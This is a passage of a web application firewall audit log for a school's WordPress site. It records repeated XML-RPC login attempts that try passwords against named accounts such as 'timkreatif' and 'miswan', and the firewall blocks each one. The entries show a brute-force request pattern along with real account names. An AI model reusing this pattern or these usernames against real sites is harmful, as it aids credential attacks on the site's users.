This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515825439492 4876 (- - -) Stopwatch2: 1745515825439492 4876; combined=3284, p1=383, p2=2744, p3=0, p4=0, p5=94, sr=73, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5c01021-Z-- --1d633915-A-- [25/Apr/2025:00:30:28 +0700] aAp1NMlQo524fhbIj1ycqQAAABg 103.236.140.4 33200 103.236.140.4 8181 --1d633915-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1d633915-C-- wp.getUsersBlogs kesiswaan a1s2d3f4 --1d633915-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d633915-E-- --1d633915-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (150+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515828027862 4733 (- - -) Stopwatch2: 1745515828027862 4733; combined=3369, p1=427, p2=2705, p3=0, p4=0, p5=132, sr=91, sw=105, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d633915-Z-- --91557927-A-- [25/Apr/2025:00:31:28 +0700] aAp1cMlQo524fhbIj1yd0wAAABA 103.236.140.4 37512 103.236.140.4 8181 --91557927-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --91557927-C-- wp.getUsersBlogs kesiswaan anthony --91557927-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91557927-E-- --91557927-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515888022929 4144 (- - -) Stopwatch2: 1745515888022929 4144; combined=2954, p1=385, p2=2438, p3=0, p4=0, p5=77, sr=80, sw=54, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91557927-Z-- --e6051136-A-- [25/Apr/2025:00:32:28 +0700] aAp1rGLuk3f9kLjsdTaaKgAAAIE 103.236.140.4 42868 103.236.140.4 8181 --e6051136-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e6051136-C-- wp.getUsersBlogs kesiswaan tennis --e6051136-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6051136-E-- --e6051136-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (139+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515948275031 5090 (- - -) Stopwatch2: 1745515948275031 5090; combined=3498, p1=468, p2=2858, p3=0, p4=0, p5=101, sr=83, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6051136-Z-- --be5ff223-A-- [25/Apr/2025:00:33:28 +0700] aAp16GLuk3f9kLjsdTaazQAAAIQ 103.236.140.4 47864 103.236.140.4 8181 --be5ff223-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --be5ff223-C-- wp.getUsersBlogs kesiswaan mynoob --be5ff223-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be5ff223-E-- --be5ff223-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (130+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516008267834 4791 (- - -) Stopwatch2: 1745516008267834 4791; combined=3282, p1=460, p2=2652, p3=0, p4=0, p5=97, sr=116, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be5ff223-Z-- --2d7b161f-A-- [25/Apr/2025:00:34:28 +0700] aAp2JGLuk3f9kLjsdTab7wAAAI0 103.236.140.4 52188 103.236.140.4 8181 --2d7b161f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2d7b161f-C-- wp.getUsersBlogs timkreatif 1qazxsw2 --2d7b161f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d7b161f-E-- --2d7b161f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (132+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516068214480 4554 (- - -) Stopwatch2: 1745516068214480 4554; combined=3186, p1=388, p2=2651, p3=0, p4=0, p5=87, sr=72, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d7b161f-Z-- --a7a28d36-A-- [25/Apr/2025:00:35:28 +0700] aAp2YN5yz20UX9VrdZPffAAAAFM 103.236.140.4 56676 103.236.140.4 8181 --a7a28d36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 233 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a7a28d36-C-- wp.getUsersBlogs timkreatif smkn22-jkt.sch888 --a7a28d36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7a28d36-E-- --a7a28d36-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (137+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516128262088 5692 (- - -) Stopwatch2: 1745516128262088 5692; combined=4297, p1=533, p2=3570, p3=0, p4=0, p5=115, sr=90, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7a28d36-Z-- --7ddaa926-A-- [25/Apr/2025:00:36:28 +0700] aAp2nN5yz20UX9VrdZPggQAAAEg 103.236.140.4 32968 103.236.140.4 8181 --7ddaa926-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7ddaa926-C-- wp.getUsersBlogs timkreatif 123@qwe --7ddaa926-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ddaa926-E-- --7ddaa926-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (140+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516188004783 4917 (- - -) Stopwatch2: 1745516188004783 4917; combined=3863, p1=451, p2=3227, p3=0, p4=0, p5=107, sr=84, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ddaa926-Z-- --df956a16-A-- [25/Apr/2025:00:37:28 +0700] aAp22MlQo524fhbIj1yl3AAAABY 103.236.140.4 37744 103.236.140.4 8181 --df956a16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --df956a16-C-- wp.getUsersBlogs timkreatif xxxx --df956a16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df956a16-E-- --df956a16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (145+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516248023814 4592 (- - -) Stopwatch2: 1745516248023814 4592; combined=3377, p1=398, p2=2822, p3=0, p4=0, p5=93, sr=80, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df956a16-Z-- --c160e425-A-- [25/Apr/2025:00:37:51 +0700] aAp278lQo524fhbIj1ymmwAAABI 103.236.140.4 39900 103.236.140.4 8181 --c160e425-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c160e425-C-- wp.getUsersBlogs timkreatif 1234%^&* --c160e425-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c160e425-E-- --c160e425-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516271186695 4271 (- - -) Stopwatch2: 1745516271186695 4271; combined=2949, p1=362, p2=2442, p3=0, p4=0, p5=89, sr=69, sw=56, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c160e425-Z-- --26e6ba71-A-- [25/Apr/2025:00:38:28 +0700] aAp3FN5yz20UX9VrdZPjPgAAAFA 103.236.140.4 43490 103.236.140.4 8181 --26e6ba71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --26e6ba71-C-- wp.getUsersBlogs timkreatif livetest --26e6ba71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26e6ba71-E-- --26e6ba71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516308299768 4111 (- - -) Stopwatch2: 1745516308299768 4111; combined=2774, p1=362, p2=2276, p3=0, p4=0, p5=80, sr=75, sw=56, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26e6ba71-Z-- --982a1b4f-A-- [25/Apr/2025:00:39:28 +0700] aAp3UGLuk3f9kLjsdTagsQAAAIo 103.236.140.4 48600 103.236.140.4 8181 --982a1b4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --982a1b4f-C-- wp.getUsersBlogs timkreatif evite --982a1b4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --982a1b4f-E-- --982a1b4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (132+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516368112362 4928 (- - -) Stopwatch2: 1745516368112362 4928; combined=3408, p1=438, p2=2807, p3=0, p4=0, p5=97, sr=93, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --982a1b4f-Z-- --31882720-A-- [25/Apr/2025:00:40:28 +0700] aAp3jMlQo524fhbIj1yq2wAAABg 103.236.140.4 53924 103.236.140.4 8181 --31882720-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --31882720-C-- wp.getUsersBlogs timkreatif 789456 --31882720-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31882720-E-- --31882720-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (133+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516428339754 4537 (- - -) Stopwatch2: 1745516428339754 4537; combined=3497, p1=382, p2=2964, p3=0, p4=0, p5=90, sr=80, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31882720-Z-- --193ff947-A-- [25/Apr/2025:00:41:28 +0700] aAp3yPiVYlyO1xhz7yPV0QAAAMk 103.236.140.4 58694 103.236.140.4 8181 --193ff947-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --193ff947-C-- wp.getUsersBlogs miswan miswan@2019 --193ff947-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --193ff947-E-- --193ff947-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (125+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516488702719 5452 (- - -) Stopwatch2: 1745516488702719 5452; combined=3984, p1=447, p2=3332, p3=0, p4=0, p5=119, sr=97, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --193ff947-Z-- --ec51c42c-A-- [25/Apr/2025:00:42:28 +0700] aAp4BGLuk3f9kLjsdTaj5QAAAIg 103.236.140.4 35198 103.236.140.4 8181 --ec51c42c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ec51c42c-C-- wp.getUsersBlogs miswan trustno1 --ec51c42c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec51c42c-E-- --ec51c42c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (130+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516548192011 6247 (- - -) Stopwatch2: 1745516548192011 6247; combined=4423, p1=562, p2=3690, p3=0, p4=0, p5=102, sr=104, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec51c42c-Z-- --f3ac124f-A-- [25/Apr/2025:00:43:28 +0700] aAp4QPiVYlyO1xhz7yPYkwAAANI 103.236.140.4 40118 103.236.140.4 8181 --f3ac124f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f3ac124f-C-- wp.getUsersBlogs miswan access --f3ac124f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3ac124f-E-- --f3ac124f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (124+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516608038618 5196 (- - -) Stopwatch2: 1745516608038618 5196; combined=3700, p1=452, p2=3056, p3=0, p4=0, p5=111, sr=91, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3ac124f-Z-- --89604a5f-A-- [25/Apr/2025:00:44:28 +0700] aAp4fMlQo524fhbIj1ywhAAAABY 103.236.140.4 44538 103.236.140.4 8181 --89604a5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 